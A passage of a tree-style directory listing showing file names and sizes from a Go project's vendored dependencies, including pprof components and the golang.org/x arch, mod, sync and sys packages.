│ │ │ │ │ │ │ │ ├── [ 18K] commands.go
│ │ │ │ │ │ │ │ ├── [ 10K] config.go
│ │ │ │ │ │ │ │ ├── [6.4K] driver_focus.go
│ │ │ │ │ │ │ │ ├── [9.7K] driver.go
│ │ │ │ │ │ │ │ ├── [ 17K] fetch.go
│ │ │ │ │ │ │ │ ├── [1.9K] flags.go
│ │ │ │ │ │ │ │ ├── [3.0K] flamegraph.go
│ │ │ │ │ │ │ │ ├── [ 11K] interactive.go
│ │ │ │ │ │ │ │ ├── [2.3K] options.go
│ │ │ │ │ │ │ │ ├── [4.1K] settings.go
│ │ │ │ │ │ │ │ ├── [2.2K] svg.go
│ │ │ │ │ │ │ │ ├── [3.1K] tagroot.go
│ │ │ │ │ │ │ │ ├── [1.7K] tempfile.go
│ │ │ │ │ │ │ │ ├── [ 36K] webhtml.go
│ │ │ │ │ │ │ │ └── [ 13K] webui.go
│ │ │ │ │ │ │ ├── [4.0K] elfexec
│ │ │ │ │ │ │ │ └── [ 14K] elfexec.go
│ │ │ │ │ │ │ ├── [4.0K] graph
│ │ │ │ │ │ │ │ ├── [ 15K] dotgraph.go
│ │ │ │ │ │ │ │ └── [ 31K] graph.go
│ │ │ │ │ │ │ ├── [4.0K] measurement
│ │ │ │ │ │ │ │ └── [9.0K] measurement.go
│ │ │ │ │ │ │ ├── [4.0K] plugin
│ │ │ │ │ │ │ │ └── [7.8K] plugin.go
│ │ │ │ │ │ │ ├── [4.0K] report
│ │ │ │ │ │ │ │ ├── [ 37K] report.go
│ │ │ │ │ │ │ │ ├── [ 32K] source.go
│ │ │ │ │ │ │ │ ├── [1.7K] source_html.go
│ │ │ │ │ │ │ │ └── [ 883] synth.go
│ │ │ │ │ │ │ ├── [4.0K] symbolizer
│ │ │ │ │ │ │ │ └── [ 10K] symbolizer.go
│ │ │ │ │ │ │ ├── [4.0K] symbolz
│ │ │ │ │ │ │ │ └── [5.4K] symbolz.go
│ │ │ │ │ │ │ └── [4.0K] transport
│ │ │ │ │ │ │ └── [3.8K] transport.go
│ │ │ │ │ │ ├── [ 11K] LICENSE
│ │ │ │ │ │ ├── [4.0K] profile
│ │ │ │ │ │ │ ├── [ 17K] encode.go
│ │ │ │ │ │ │ ├── [7.4K] filter.go
│ │ │ │ │ │ │ ├── [1.9K] index.go
│ │ │ │ │ │ │ ├── [8.8K] legacy_java_profile.go
│ │ │ │ │ │ │ ├── [ 33K] legacy_profile.go
│ │ │ │ │ │ │ ├── [ 12K] merge.go
│ │ │ │ │ │ │ ├── [ 20K] profile.go
│ │ │ │ │ │ │ ├── [7.5K] proto.go
│ │ │ │ │ │ │ └── [5.0K] prune.go
│ │ │ │ │ │ └── [4.0K] third_party
│ │ │ │ │ │ ├── [4.0K] d3flamegraph
│ │ │ │ │ │ │ ├── [ 71K] d3_flame_graph.go
│ │ │ │ │ │ │ ├── [ 11K] D3_FLAME_GRAPH_LICENSE
│ │ │ │ │ │ │ ├── [ 731] D3_LICENSE
│ │ │ │ │ │ │ ├── [ 443] index.js
│ │ │ │ │ │ │ ├── [ 351] package.json
│ │ │ │ │ │ │ ├── [ 45K] package-lock.json
│ │ │ │ │ │ │ ├── [1.0K] README.md
│ │ │ │ │ │ │ ├── [1.7K] update.sh
│ │ │ │ │ │ │ └── [ 484] webpack.config.js
│ │ │ │ │ │ └── [4.0K] svgpan
│ │ │ │ │ │ ├── [1.7K] LICENSE
│ │ │ │ │ │ └── [7.9K] svgpan.go
│ │ │ │ │ └── [4.0K] ianlancetaylor
│ │ │ │ │ └── [4.0K] demangle
│ │ │ │ │ ├── [ 82K] ast.go
│ │ │ │ │ ├── [ 82K] demangle.go
│ │ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ │ ├── [ 107] README.md
│ │ │ │ │ └── [ 22K] rust.go
│ │ │ │ ├── [4.0K] golang.org
│ │ │ │ │ └── [4.0K] x
│ │ │ │ │ ├── [4.0K] arch
│ │ │ │ │ │ ├── [4.0K] arm
│ │ │ │ │ │ │ └── [4.0K] armasm
│ │ │ │ │ │ │ ├── [ 13K] decode.go
│ │ │ │ │ │ │ ├── [3.5K] gnu.go
│ │ │ │ │ │ │ ├── [7.5K] inst.go
│ │ │ │ │ │ │ ├── [ 149] Makefile
│ │ │ │ │ │ │ ├── [ 12K] plan9x.go
│ │ │ │ │ │ │ └── [267K] tables.go
│ │ │ │ │ │ ├── [4.0K] arm64
│ │ │ │ │ │ │ └── [4.0K] arm64asm
│ │ │ │ │ │ │ ├── [ 20K] arg.go
│ │ │ │ │ │ │ ├── [9.6K] condition.go
│ │ │ │ │ │ │ ├── [1.4K] condition_util.go
│ │ │ │ │ │ │ ├── [ 77K] decode.go
│ │ │ │ │ │ │ ├── [1.0K] gnu.go
│ │ │ │ │ │ │ ├── [ 15K] inst.go
│ │ │ │ │ │ │ ├── [235K] inst.json
│ │ │ │ │ │ │ ├── [ 17K] plan9x.go
│ │ │ │ │ │ │ └── [212K] tables.go
│ │ │ │ │ │ ├── [ 174] AUTHORS
│ │ │ │ │ │ ├── [ 171] CONTRIBUTORS
│ │ │ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ │ │ ├── [1.3K] PATENTS
│ │ │ │ │ │ ├── [4.0K] ppc64
│ │ │ │ │ │ │ └── [4.0K] ppc64asm
│ │ │ │ │ │ │ ├── [5.2K] decode.go
│ │ │ │ │ │ │ ├── [ 250] doc.go
│ │ │ │ │ │ │ ├── [2.7K] field.go
│ │ │ │ │ │ │ ├── [ 12K] gnu.go
│ │ │ │ │ │ │ ├── [4.5K] inst.go
│ │ │ │ │ │ │ ├── [ 10K] plan9.go
│ │ │ │ │ │ │ └── [334K] tables.go
│ │ │ │ │ │ └── [4.0K] x86
│ │ │ │ │ │ └── [4.0K] x86asm
│ │ │ │ │ │ ├── [ 45K] decode.go
│ │ │ │ │ │ ├── [ 21K] gnu.go
│ │ │ │ │ │ ├── [ 11K] inst.go
│ │ │ │ │ │ ├── [ 12K] intel.go
│ │ │ │ │ │ ├── [ 150] Makefile
│ │ │ │ │ │ ├── [6.9K] plan9x.go
│ │ │ │ │ │ └── [267K] tables.go
│ │ │ │ │ ├── [4.0K] crypto
│ │ │ │ │ │ ├── [ 174] AUTHORS
│ │ │ │ │ │ ├── [ 171] CONTRIBUTORS
│ │ │ │ │ │ ├── [4.0K] ed25519
│ │ │ │ │ │ │ └── [2.7K] ed25519.go
│ │ │ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ │ │ └── [1.3K] PATENTS
│ │ │ │ │ ├── [4.0K] mod
│ │ │ │ │ │ ├── [4.0K] internal
│ │ │ │ │ │ │ └── [4.0K] lazyregexp
│ │ │ │ │ │ │ └── [1.8K] lazyre.go
│ │ │ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ │ │ ├── [4.0K] modfile
│ │ │ │ │ │ │ ├── [3.5K] print.go
│ │ │ │ │ │ │ ├── [ 23K] read.go
│ │ │ │ │ │ │ ├── [ 41K] rule.go
│ │ │ │ │ │ │ └── [5.2K] work.go
│ │ │ │ │ │ ├── [4.0K] module
│ │ │ │ │ │ │ ├── [ 27K] module.go
│ │ │ │ │ │ │ └── [8.4K] pseudo.go
│ │ │ │ │ │ ├── [1.3K] PATENTS
│ │ │ │ │ │ ├── [4.0K] semver
│ │ │ │ │ │ │ └── [8.8K] semver.go
│ │ │ │ │ │ ├── [4.0K] sumdb
│ │ │ │ │ │ │ ├── [1.5K] cache.go
│ │ │ │ │ │ │ ├── [ 20K] client.go
│ │ │ │ │ │ │ ├── [4.0K] dirhash
│ │ │ │ │ │ │ │ └── [3.9K] hash.go
│ │ │ │ │ │ │ ├── [4.0K] note
│ │ │ │ │ │ │ │ └── [ 20K] note.go
│ │ │ │ │ │ │ ├── [4.9K] server.go
│ │ │ │ │ │ │ ├── [2.8K] test.go
│ │ │ │ │ │ │ └── [4.0K] tlog
│ │ │ │ │ │ │ ├── [3.7K] note.go
│ │ │ │ │ │ │ ├── [ 13K] tile.go
│ │ │ │ │ │ │ └── [ 18K] tlog.go
│ │ │ │ │ │ └── [4.0K] zip
│ │ │ │ │ │ └── [ 29K] zip.go
│ │ │ │ │ ├── [4.0K] sync
│ │ │ │ │ │ ├── [ 173] AUTHORS
│ │ │ │ │ │ ├── [ 170] CONTRIBUTORS
│ │ │ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ │ │ ├── [1.3K] PATENTS
│ │ │ │ │ │ └── [4.0K] semaphore
│ │ │ │ │ │ └── [3.5K] semaphore.go
│ │ │ │ │ ├── [4.0K] sys
│ │ │ │ │ │ ├── [ 173] AUTHORS
│ │ │ │ │ │ ├── [ 170] CONTRIBUTORS
│ │ │ │ │ │ ├── [4.0K] internal
│ │ │ │ │ │ │ └── [4.0K] unsafeheader
│ │ │ │ │ │ │ └── [ 913] unsafeheader.go
│ │ │ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ │ │ ├── [1.3K] PATENTS
│ │ │ │ │ │ ├── [4.0K] plan9
│ │ │ │ │ │ │ ├── [ 702] asm_plan9_386.s
│ │ │ │ │ │ │ ├── [ 704] asm_plan9_amd64.s
│ │ │ │ │ │ │ ├── [ 644] asm_plan9_arm.s
│ │ │ │ │ │ │ ├── [ 214] asm.s
│ │ │ │ │ │ │ ├── [1004] const_plan9.go
│ │ │ │ │ │ │ ├── [5.6K] dir_plan9.go
│ │ │ │ │ │ │ ├── [ 555] env_plan9.go
│ │ │ │ │ │ │ ├── [1.5K] errors_plan9.go
│ │ │ │ │ │ │ ├── [4.4K] mkall.sh
│ │ │ │ │ │ │ ├── [5.9K] mkerrors.sh
│ │ │ │ │ │ │ ├── [ 459] mksysnum_plan9.sh
│ │ │ │ │ │ │ ├── [ 389] pwd_go15_plan9.go
│ │ │ │ │ │ │ ├── [ 430] pwd_plan9.go
│ │ │ │ │ │ │ ├── [ 472] race0.go
│ │ │ │ │ │ │ ├── [ 608] race.go
│ │ │ │ │ │ │ ├── [ 516] str.go
│ │ │ │ │ │ │ ├── [3.4K] syscall.go
│ │ │ │ │ │ │ ├── [7.0K] syscall_plan9.go
│ │ │ │ │ │ │ ├── [6.2K] zsyscall_plan9_386.go
│ │ │ │ │ │ │ ├── [6.2K] zsyscall_plan9_amd64.go
│ │ │ │ │ │ │ ├── [6.2K] zsyscall_plan9_arm.go
│ │ │ │ │ │ │ └── [1.0K] zsysnum_plan9.go
│ │ │ │ │ │ ├── [ 16K] unix
│ │ │ │ │ │ │ ├── [1.9K] affinity_linux.go
│ │ │ │ │ │ │ ├── [ 484] aliases.go
│ │ │ │ │ │ │ ├── [ 420] asm_aix_ppc64.s
│ │ │ │ │ │ │ ├── [ 742] asm_bsd_386.s
│ │ │ │ │ │ │ ├── [ 785] asm_bsd_amd64.s
│ │ │ │ │ │ │ ├── [ 762] asm_bsd_arm64.s
│ │ │ │ │ │ │ ├── [ 732] asm_bsd_arm.s
│ │ │ │ │ │ │ ├── [1.4K] asm_linux_386.s
│ │ │ │ │ │ │ ├── [1.2K] asm_linux_amd64.s
│ │ │ │ │ │ │ ├── [1.1K] asm_linux_arm64.s
│ │ │ │ │ │ │ ├── [1.1K] asm_linux_arm.s
│ │ │ │ │ │ │ ├── [1.2K] asm_linux_mips64x.s
│ │ │ │ │ │ │ ├── [1.2K] asm_linux_mipsx.s
│ │ │ │ │ │ │ ├── [ 962] asm_linux_ppc64x.s
│ │ │ │ │ │ │ ├── [1.0K] asm_linux_riscv64.s
│ │ │ │ │ │ │ ├── [1.2K] asm_linux_s390x.s
│ │ │ │ │ │ │ ├── [ 690] asm_openbsd_mips64.s
│ │ │ │ │ │ │ ├── [ 436] asm_solaris_amd64.s
│ │ │ │ │ │ │ ├── [8.4K] asm_zos_s390x.s
│ │ │ │ │ │ │ ├── [ 680] bluetooth_linux.go
│ │ │ │ │ │ │ ├── [5.0K] cap_freebsd.go
│ │ │ │ │ │ │ ├── [ 390] constants.go
│ │ │ │ │ │ │ ├── [ 878] dev_aix_ppc64.go
│ │ │ │ │ │ │ ├── [ 757] dev_aix_ppc.go
│ │ │ │ │ │ │ ├── [ 747] dev_darwin.go
│ │ │ │ │ │ │ ├── [1.0K] dev_dragonfly.go
│ │ │ │ │ │ │ ├── [1013] dev_freebsd.go
│ │ │ │ │ │ │ ├── [1.5K] dev_linux.go
│ │ │ │ │ │ │ ├── [ 913] dev_netbsd.go
│ │ │ │ │ │ │ ├── [ 918] dev_openbsd.go
│ │ │ │ │ │ │ ├── [ 850] dev_zos.go
│ │ │ │ │ │ │ ├── [3.1K] dirent.go
│ │ │ │ │ │ │ ├── [ 421] endian_big.go
│ │ │ │ │ │ │ ├── [ 451] endian_little.go
│ │ │ │ │ │ │ ├── [ 717] env_unix.go
│ │ │ │ │ │ │ ├── [5.0K] epoll_zos.go
│ │ │ │ │ │ │ ├── [9.4K] errors_freebsd_386.go
│ │ │ │ │ │ │ ├── [9.4K] errors_freebsd_amd64.go
│ │ │ │ │ │ │ ├── [ 481] errors_freebsd_arm64.go
│ │ │ │ │ │ │ ├── [8.8K] errors_freebsd_arm.go
│ │ │ │ │ │ │ ├── [ 806] fcntl_darwin.go
│ │ │ │ │ │ │ ├── [1.1K] fcntl.go
│ │ │ │ │ │ │ ├── [ 500] fcntl_linux_32bit.go
│ │ │ │ │ │ │ ├── [ 853] fdset.go
│ │ │ │ │ │ │ ├── [4.1K] fstatfs_zos.go
│ │ │ │ │ │ │ ├── [1.5K] gccgo_c.c
│ │ │ │ │ │ │ ├── [1.9K] gccgo.go
│ │ │ │ │ │ │ ├── [ 464] gccgo_linux_amd64.go
│ │ │ │ │ │ │ ├── [4.5K] ifreq_linux.go
│ │ │ │ │ │ │ ├── [2.5K] ioctl.go
│ │ │ │ │ │ │ ├── [7.3K] ioctl_linux.go
│ │ │ │ │ │ │ ├── [2.1K] ioctl_zos.go
│ │ │ │ │ │ │ ├── [8.0K] mkall.sh
│ │ │ │ │ │ │ ├── [ 19K] mkerrors.sh
│ │ │ │ │ │ │ ├── [ 457] pagesize_unix.go
│ │ │ │ │ │ │ ├── [3.7K] pledge_openbsd.go
│ │ │ │ │ │ │ ├── [ 337] ptrace_darwin.go
│ │ │ │ │ │ │ ├── [ 298] ptrace_ios.go
│ │ │ │ │ │ │ ├── [ 643] race0.go
│ │ │ │ │ │ │ ├── [ 675] race.go
│ │ │ │ │ │ │ ├── [ 454] readdirent_getdents.go
│ │ │ │ │ │ │ ├── [ 715] readdirent_getdirentries.go
│ │ │ │ │ │ │ ├── [8.5K] README.md
│ │ │ │ │ │ │ ├── [ 544] sockcmsg_dragonfly.go
│ │ │ │ │ │ │ ├── [2.6K] sockcmsg_linux.go
│ │ │ │ │ │ │ ├── [2.7K] sockcmsg_unix.go
│ │ │ │ │ │ │ ├── [1.3K] sockcmsg_unix_other.go
│ │ │ │ │ │ │ ├── [ 705] str.go
│ │ │ │ │ │ │ ├── [ 15K] syscall_aix.go
│ │ │ │ │ │ │ ├── [2.0K] syscall_aix_ppc64.go
│ │ │ │ │ │ │ ├── [1.4K] syscall_aix_ppc.go
│ │ │ │ │ │ │ ├── [ 15K] syscall_bsd.go
│ │ │ │ │ │ │ ├── [ 885] syscall_darwin.1_12.go
│ │ │ │ │ │ │ ├── [2.7K] syscall_darwin.1_13.go
│ │ │ │ │ │ │ ├── [1.5K] syscall_darwin_amd64.go
│ │ │ │ │ │ │ ├── [1.4K] syscall_darwin_arm64.go
│ │ │ │ │ │ │ ├── [ 22K] syscall_darwin.go
│ │ │ │ │ │ │ ├── [1.2K] syscall_darwin_libSystem.go
│ │ │ │ │ │ │ ├── [1.3K] syscall_dragonfly_amd64.go
│ │ │ │ │ │ │ ├── [ 14K] syscall_dragonfly.go
│ │ │ │ │ │ │ ├── [1.8K] syscall_freebsd_386.go
│ │ │ │ │ │ │ ├── [1.7K] syscall_freebsd_amd64.go
│ │ │ │ │ │ │ ├── [1.6K] syscall_freebsd_arm64.go
│ │ │ │ │ │ │ ├── [1.6K] syscall_freebsd_arm.go
│ │ │ │ │ │ │ ├── [ 24K] syscall_freebsd.go
│ │ │ │ │ │ │ ├── [3.0K] syscall.go
│ │ │ │ │ │ │ ├── [4.2K] syscall_illumos.go
│ │ │ │ │ │ │ ├── [9.7K] syscall_linux_386.go
│ │ │ │ │ │ │ ├── [ 534] syscall_linux_alarm.go
│ │ │ │ │ │ │ ├── [ 315] syscall_linux_amd64_gc.go
│ │ │ │ │ │ │ ├── [5.5K] syscall_linux_amd64.go
│ │ │ │ │ │ │ ├── [6.4K] syscall_linux_arm64.go
│ │ │ │ │ │ │ ├── [7.8K] syscall_linux_arm.go
│ │ │ │ │ │ │ ├── [ 608] syscall_linux_gc_386.go
│ │ │ │ │ │ │ ├── [ 434] syscall_linux_gc_arm.go
│ │ │ │ │ │ │ ├── [1012] syscall_linux_gccgo_386.go
│ │ │ │ │ │ │ ├── [ 622] syscall_linux_gccgo_arm.go
│ │ │ │ │ │ │ ├── [ 514] syscall_linux_gc.go
│ │ │ │ │ │ │ ├── [ 71K] syscall_linux.go
│ │ │ │ │ │ │ ├── [6.1K] syscall_linux_mips64x.go
│ │ │ │ │ │ │ ├── [6.6K] syscall_linux_mipsx.go
│ │ │ │ │ │ │ ├── [5.3K] syscall_linux_ppc64x.go
│ │ │ │ │ │ │ ├── [7.6K] syscall_linux_ppc.go
│ │ │ │ │ │ │ ├── [6.1K] syscall_linux_riscv64.go
│ │ │ │ │ │ │ ├── [9.6K] syscall_linux_s390x.go
│ │ │ │ │ │ │ ├── [4.7K] syscall_linux_sparc64.go
│ │ │ │ │ │ │ ├── [ 840] syscall_netbsd_386.go
│ │ │ │ │ │ │ ├── [ 837] syscall_netbsd_amd64.go
│ │ │ │ │ │ │ ├── [ 837] syscall_netbsd_arm64.go
│ │ │ │ │ │ │ ├── [ 840] syscall_netbsd_arm.go
│ │ │ │ │ │ │ ├── [ 16K] syscall_netbsd.go
│ │ │ │ │ │ │ ├── [1022] syscall_openbsd_386.go
│ │ │ │ │ │ │ ├── [1014] syscall_openbsd_amd64.go
│ │ │ │ │ │ │ ├── [1014] syscall_openbsd_arm64.go
│ │ │ │ │ │ │ ├── [1022] syscall_openbsd_arm.go
│ │ │ │ │ │ │ ├── [ 11K] syscall_openbsd.go
│ │ │ │ │ │ │ ├── [ 874] syscall_openbsd_mips64.go
│ │ │ │ │ │ │ ├── [ 617] syscall_solaris_amd64.go
│ │ │ │ │ │ │ ├── [ 27K] syscall_solaris.go
│ │ │ │ │ │ │ ├── [ 751] syscall_unix_gc.go
│ │ │ │ │ │ │ ├── [ 839] syscall_unix_gc_ppc64x.go
│ │ │ │ │ │ │ ├── [ 12K] syscall_unix.go
│ │ │ │ │ │ │ ├── [ 49K] syscall_zos_s390x.go
│ │ │ │ │ │ │ ├── [ 537] sysvshm_linux.go
│ │ │ │ │ │ │ ├── [1.6K] sysvshm_unix.go
│ │ │ │ │ │ │ ├── [ 420] sysvshm_unix_other.go
│ │ │ │ │ │ │ ├── [2.3K] timestruct.go
│ │ │ │ │ │ │ ├── [1.0K] unveil_openbsd.go
│ │ │ │ │ │ │ ├── [5.0K] xattr_bsd.go
│ │ │ │ │ │ │ ├── [ 53K] zerrors_aix_ppc64.go
│ │ │ │ │ │ │ ├── [ 52K] zerrors_aix_ppc.go
│ │ │ │ │ │ │ ├── [ 87K] zerrors_darwin_amd64.go
│ │ │ │ │ │ │ ├── [ 87K] zerrors_darwin_arm64.go
│ │ │ │ │ │ │ ├── [ 71K] zerrors_dragonfly_amd64.go
│ │ │ │ │ │ │ ├── [ 76K] zerrors_freebsd_386.go
│ │ │ │ │ │ │ ├── [ 76K] zerrors_freebsd_amd64.go
│ │ │ │ │ │ │ ├── [ 76K] zerrors_freebsd_arm64.go
│ │ │ │ │ │ │ ├── [ 72K] zerrors_freebsd_arm.go
│ │ │ │ │ │ │ ├── [ 33K] zerrors_linux_386.go
│ │ │ │ │ │ │ ├── [ 33K] zerrors_linux_amd64.go
│ │ │ │ │ │ │ ├── [ 33K] zerrors_linux_arm64.go
│ │ │ │ │ │ │ ├── [ 34K] zerrors_linux_arm.go
│ │ │ │ │ │ │ ├── [155K] zerrors_linux.go
│ │ │ │ │ │ │ ├── [ 34K] zerrors_linux_mips64.go
│ │ │ │ │ │ │ ├── [ 34K] zerrors_linux_mips64le.go
│ │ │ │ │ │ │ ├── [ 34K] zerrors_linux_mips.go
│ │ │ │ │ │ │ ├── [ 34K] zerrors_linux_mipsle.go
│ │ │ │ │ │ │ ├── [ 36K] zerrors_linux_ppc64.go
│ │ │ │ │ │ │ ├── [ 36K] zerrors_linux_ppc64le.go
│ │ │ │ │ │ │ ├── [ 36K] zerrors_linux_ppc.go
│ │ │ │ │ │ │ ├── [ 33K] zerrors_linux_riscv64.go
│ │ │ │ │ │ │ ├── [ 36K] zerrors_linux_s390x.go
│ │ │ │ │ │ │ ├── [ 36K] zerrors_linux_sparc64.go
│ │ │ │ │ │ │ ├── [ 73K] zerrors_netbsd_386.go
│ │ │ │ │ │ │ ├── [ 72K] zerrors_netbsd_amd64.go
│ │ │ │ │ │ │ ├── [ 72K] zerrors_netbsd_arm64.go
│ │ │ │ │ │ │ ├── [ 72K] zerrors_netbsd_arm.go
│ │ │ │ │ │ │ ├── [ 68K] zerrors_openbsd_386.go
│ │ │ │ │ │ │ ├── [ 73K] zerrors_openbsd_amd64.go
│ │ │ │ │ │ │ ├── [ 74K] zerrors_openbsd_arm64.go
│ │ │ │ │ │ │ ├── [ 68K] zerrors_openbsd_arm.go
│ │ │ │ │ │ │ ├── [ 77K] zerrors_openbsd_mips64.go
│ │ │ │ │ │ │ ├── [ 59K] zerrors_solaris_amd64.go
│ │ │ │ │ │ │ ├── [ 34K] zerrors_zos_s390x.go
│ │ │ │ │ │ │ ├── [1.2K] zptrace_armnn_linux.go
│ │ │ │ │ │ │ ├── [ 733] zptrace_linux_arm64.go
│ │ │ │ │ │ │ ├── [1.5K] zptrace_mipsnnle_linux.go
│ │ │ │ │ │ │ ├── [1.4K] zptrace_mipsnn_linux.go
│ │ │ │ │ │ │ ├── [1.9K] zptrace_x86_linux.go
│ │ │ │ │ │ │ ├── [ 31K] zsyscall_aix_ppc64_gccgo.go
│ │ │ │ │ │ │ ├── [ 43K] zsyscall_aix_ppc64_gc.go
│ │ │ │ │ │ │ ├── [ 31K] zsyscall_aix_ppc64.go
│ │ │ │ │ │ │ ├── [ 36K] zsyscall_aix_ppc.go
│ │ │ │ │ │ │ ├── [1.0K] zsyscall_darwin_amd64.1_13.go
│ │ │ │ │ │ │ ├── [ 766] zsyscall_darwin_amd64.1_13.s
│ │ │ │ │ │ │ ├── [ 65K] zsyscall_darwin_amd64.go
│ │ │ │ │ │ │ ├── [ 29K] zsyscall_darwin_amd64.s
│ │ │ │ │ │ │ ├── [1.0K] zsyscall_darwin_arm64.1_13.go
│ │ │ │ │ │ │ ├── [ 766] zsyscall_darwin_arm64.1_13.s
│ │ │ │ │ │ │ ├── [ 65K] zsyscall_darwin_arm64.go
│ │ │ │ │ │ │ ├── [ 29K] zsyscall_darwin_arm64.s
│ │ │ │ │ │ │ ├── [ 39K] zsyscall_dragonfly_amd64.go
│ │ │ │ │ │ │ ├── [ 48K] zsyscall_freebsd_386.go
│ │ │ │ │ │ │ ├── [ 48K] zsyscall_freebsd_amd64.go
│ │ │ │ │ │ │ ├── [ 48K] zsyscall_freebsd_arm64.go
│ │ │ │ │ │ │ ├── [ 48K] zsyscall_freebsd_arm.go
│ │ │ │ │ │ │ ├── [3.5K] zsyscall_illumos_amd64.go
│ │ │ │ │ │ │ ├── [ 13K] zsyscall_linux_386.go
│ │ │ │ │ │ │ ├── [ 18K] zsyscall_linux_amd64.go
│ │ │ │ │ │ │ ├── [ 15K] zsyscall_linux_arm64.go
│ │ │ │ │ │ │ ├── [ 17K] zsyscall_linux_arm.go
│ │ │ │ │ │ │ ├── [ 49K] zsyscall_linux.go
│ │ │ │ │ │ │ ├── [ 18K] zsyscall_linux_mips64.go
│ │ │ │ │ │ │ ├── [ 17K] zsyscall_linux_mips64le.go
│ │ │ │ │ │ │ ├── [ 18K] zsyscall_linux_mips.go
│ │ │ │ │ │ │ ├── [ 18K] zsyscall_linux_mipsle.go
│ │ │ │ │ │ │ ├── [ 19K] zsyscall_linux_ppc64.go
│ │ │ │ │ │ │ ├── [ 19K] zsyscall_linux_ppc64le.go
│ │ │ │ │ │ │ ├── [ 18K] zsyscall_linux_ppc.go
│ │ │ │ │ │ │ ├── [ 15K] zsyscall_linux_riscv64.go
│ │ │ │ │ │ │ ├── [ 13K] zsyscall_linux_s390x.go
│ │ │ │ │ │ │ ├── [ 18K] zsyscall_linux_sparc64.go
│ │ │ │ │ │ │ ├── [ 44K] zsyscall_netbsd_386.go
│ │ │ │ │ │ │ ├── [ 44K] zsyscall_netbsd_amd64.go
│ │ │ │ │ │ │ ├── [ 44K] zsyscall_netbsd_arm64.go
│ │ │ │ │ │ │ ├── [ 44K] zsyscall_netbsd_arm.go
│ │ │ │ │ │ │ ├── [ 40K] zsyscall_openbsd_386.go
│ │ │ │ │ │ │ ├── [ 39K] zsyscall_openbsd_amd64.go
│ │ │ │ │ │ │ ├── [ 39K] zsyscall_openbsd_arm64.go
│ │ │ │ │ │ │ ├── [ 40K] zsyscall_openbsd_arm.go
│ │ │ │ │ │ │ ├── [ 39K] zsyscall_openbsd_mips64.go
│ │ │ │ │ │ │ ├── [ 57K] zsyscall_solaris_amd64.go
│ │ │ │ │ │ │ ├── [ 30K] zsyscall_zos_s390x.go
│ │ │ │ │ │ │ ├── [ 12K] zsysctl_openbsd_386.go
│ │ │ │ │ │ │ ├── [ 12K] zsysctl_openbsd_amd64.go
│ │ │ │ │ │ │ ├── [ 12K] zsysctl_openbsd_arm64.go
│ │ │ │ │ │ │ ├── [ 12K] zsysctl_openbsd_arm.go
│ │ │ │ │ │ │ ├── [ 12K] zsysctl_openbsd_mips64.go
│ │ │ │ │ │ │ ├── [ 18K] zsysnum_darwin_amd64.go
│ │ │ │ │ │ │ ├── [ 18K] zsysnum_darwin_arm64.go
│ │ │ │ │ │ │ ├── [ 28K] zsysnum_dragonfly_amd64.go
│ │ │ │ │ │ │ ├── [ 36K] zsysnum_freebsd_386.go
│ │ │ │ │ │ │ ├── [ 36K] zsysnum_freebsd_amd64.go
│ │ │ │ │ │ │ ├── [ 36K] zsysnum_freebsd_arm64.go
│ │ │ │ │ │ │ ├── [ 36K] zsysnum_freebsd_arm.go
│ │ │ │ │ │ │ ├── [ 17K] zsysnum_linux_386.go
│ │ │ │ │ │ │ ├── [ 12K] zsysnum_linux_amd64.go
│ │ │ │ │ │ │ ├── [ 11K] zsysnum_linux_arm64.go
│ │ │ │ │ │ │ ├── [ 16K] zsysnum_linux_arm.go
│ │ │ │ │ │ │ ├── [ 13K] zsysnum_linux_mips64.go
│ │ │ │ │ │ │ ├── [ 13K] zsysnum_linux_mips64le.go
│ │ │ │ │ │ │ ├── [ 17K] zsysnum_linux_mips.go
│ │ │ │ │ │ │ ├── [ 17K] zsysnum_linux_mipsle.go
│ │ │ │ │ │ │ ├── [ 14K] zsysnum_linux_ppc64.go
│ │ │ │ │ │ │ ├── [ 14K] zsysnum_linux_ppc64le.go
│ │ │ │ │ │ │ ├── [ 17K] zsysnum_linux_ppc.go
│ │ │ │ │ │ │ ├── [ 11K] zsysnum_linux_riscv64.go
│ │ │ │ │ │ │ ├── [ 13K] zsysnum_linux_s390x.go
│ │ │ │ │ │ │ ├── [ 13K] zsysnum_linux_sparc64.go
│ │ │ │ │ │ │ ├── [ 26K] zsysnum_netbsd_386.go
│ │ │ │ │ │ │ ├── [ 26K] zsysnum_netbsd_amd64.go
│ │ │ │ │ │ │ ├── [ 26K] zsysnum_netbsd_arm64.go
│ │ │ │ │ │ │ ├── [ 26K] zsysnum_netbsd_arm.go
│ │ │ │ │ │ │ ├── [ 18K] zsysnum_openbsd_386.go
│ │ │ │ │ │ │ ├── [ 18K] zsysnum_openbsd_amd64.go
│ │ │ │ │ │ │ ├── [ 18K] zsysnum_openbsd_arm64.go
│ │ │ │ │ │ │ ├── [ 18K] zsysnum_openbsd_arm.go
│ │ │ │ │ │ │ ├── [ 18K] zsysnum_openbsd_mips64.go
│ │ │ │ │ │ │ ├── [117K] zsysnum_zos_s390x.go
│ │ │ │ │ │ │ ├── [5.0K] ztypes_aix_ppc64.go
│ │ │ │ │ │ │ ├── [4.9K] ztypes_aix_ppc.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_darwin_amd64.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_darwin_arm64.go
│ │ │ │ │ │ │ ├── [6.9K] ztypes_dragonfly_amd64.go
│ │ │ │ │ │ │ ├── [ 11K] ztypes_freebsd_386.go
│ │ │ │ │ │ │ ├── [ 11K] ztypes_freebsd_amd64.go
│ │ │ │ │ │ │ ├── [ 11K] ztypes_freebsd_arm64.go
│ │ │ │ │ │ │ ├── [ 11K] ztypes_freebsd_arm.go
│ │ │ │ │ │ │ ├── [ 647] ztypes_illumos_amd64.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_386.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_amd64.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_arm64.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_arm.go
│ │ │ │ │ │ │ ├── [231K] ztypes_linux.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_mips64.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_mips64le.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_mips.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_mipsle.go
